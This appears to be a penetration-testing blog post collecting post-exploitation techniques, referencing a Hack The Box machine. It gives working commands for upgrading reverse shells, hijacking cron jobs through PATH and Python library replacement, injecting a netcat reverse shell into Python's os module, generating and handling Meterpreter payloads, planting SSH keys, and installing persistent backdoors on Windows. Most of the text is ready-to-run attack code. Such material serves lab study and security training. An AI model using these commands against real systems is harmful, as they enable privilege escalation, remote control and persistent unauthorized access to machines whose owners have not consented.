This post is more like some techniques that could be useful.
For a guide to pentest each port click here!.
Having an interactive shell is pretty important as our connection won’t hang up when doing Ctrl + C (because it doesn’t handle pretty well the SIGINT signal), allows us to autocomplete the commands and the routes, STDERR is displayed, we have command history…
To upgrade it:
# IN REMOTE COMPUTER python -c 'import pty; pty.spawn("/bin/bash");' # Or python3 -c 'import pty; pty.spawn("/bin/bash");' # Ctrl + Z # This is to put the terminal in foreground
# IN OUR COMPUTER stty raw -echo # This allows passing through STDIN and STDOUT to the other terminal fg # We recover the Reverse Shell session
# IN REMOTE COMPUTER reset # If it asks for terminal type use: xterm-256terminal export TERMINAL=bash export TERM=xterm-256color
And that’s how you get TTY.
A way to bypass the restricted shell is:
ssh <user>@<IP> bash
bash via ssh gives us a ‘reverse shell’.
Sometimes when a file is executed as part of a routine (in a cron, a systemd, a daemon…) it might not run with the absolute path but with a relative one.
# Absolute Path /bin/bash # Relative Path bash
Relative Path commands can be altered in such a way that we can modify the PATH variable to make the OS search
bash command in our directory first (PATH is read in order from left to right). This way you can make that routine execute your command instead of the original one.
# PATH example /usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/snap/bin
This can be done with:
For example: In a server, in case there is a cron running
root, if you create a file called
fdisk with a reverse shell (could be another thing), it will connect to you and get it with
root access, as the script is being run by it.
This involves modifying or replacing a library that a Python script requires so that it executes our code.
Let’s say I have this script that is owned by another user:
#!/usr/bin/python import os print("Hello my friend!")
If somehow this script is running in a cronjob, we can trick it to execute our code as that other user.
Taking into account this script is running by
python and not
python3 we need to search for
We can alter the behaviour of the script by:
- Modifying the
oslibrary: If we have to write access over the file we can just simply put our code at the end.
- Replacing the
oslibrary: We may not have write access over the file but over the folder. In that case, we just have to create a
test.py, put our code at the end, and then replace the library:
mv test.py os.py
The code we can put at the end of the
os library to execute another code could be:
import os # HERE THE CODE os.system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.9 4444 >/tmp/f")
Then when the script is ran by the cronjob, we would have a reverse shell!
An example of privilege escalation with this method is Friendzone HTB machine.
If SSH is available we can copy our public key (usually in
~/.ssh/id_rsa.pub) to the server, more specifically to
~/.ssh/authorized_keys, doing so will let us SSH without the need of inputting a password or needing the private key.
To generate the keys in case we don’t have them, we run
ssh-keygen and it will create them automatically.
We can upgrade a rev. shell to meterpreter uploading a msf meterpreter shell and running it:
msfvenom -p <PAYLOAD> RHOST=<IP> LPORT=<PORT> -f <FORMAT> > <FILE>.<EXTENSION>
A good reference for msfvenom use is this page.
Then we can upload it via an upload page the machine could have, curl, wget, netcat, scp, ftp, powershell… It’s up to you.
When we’ve uploaded it, it’s time to run it and listen on the port to get the meterpreter:
# ON MSFCONSOLE use exploit/multi/handler set LHOST <LISTENING IP> set LPORT <LISTENING PORT> set payload <PAYLOAD USED IN MSFVENOM> run
And that should get us the met. shell.
We can upload a another reverse but this time with payload ‘cmd’. When we get the connection with the cmd reverse shell:
#Putting the session on the background background #Upgrading cmd to meterpreter sessions -u <ACTUAL CMD SESSION> #After that, it should upgrade and get back to let us select between cmd or met. #So we list the sessions to not fail. sessions -l #We select the one with description: meterpreter sessions -i <MET. SESSION>
And there we are again!
When having user and password it’s possible to manage ssh and upload files when wget or curl (for example) are restricted via a Metasploit Module or even with
# Login in msf msfconsole # Use the module use auxiliary/scanner/ssh/ssh_login # Set parameters set rhosts <remote ip> set username <user> set password <pass> # 💥 run # After creating session, upgrade it! sessions -u <session>
A backdoor is a remote persistant connection, what it means is that we can connect to the machine even when we disconnect or the pc reboots, it’ll’ always be waiting for a connection or throwing it to us. There are service backdoors, web shells…
- Tennc - Webshells
- xl7dev - Webshells
- Bartblaze - PHP
- Mattiasgeniar - PHP
- Meterpreter: In Windows we can migrate the meterpreter to another process and then make it persistent by installing a service:
# IN METERPRETER ps # WE TAKE THE PID OF EXPLORER.EXE (WINDOWS) migrate <PID> run metsvc
Or we can run:
# IN METERPRETER run persistance -A -L c:\\ -X SECS -p <OPEN PORT> -r <LHOST> # Checks connection every SECS seconds
And now we have a service listening on us.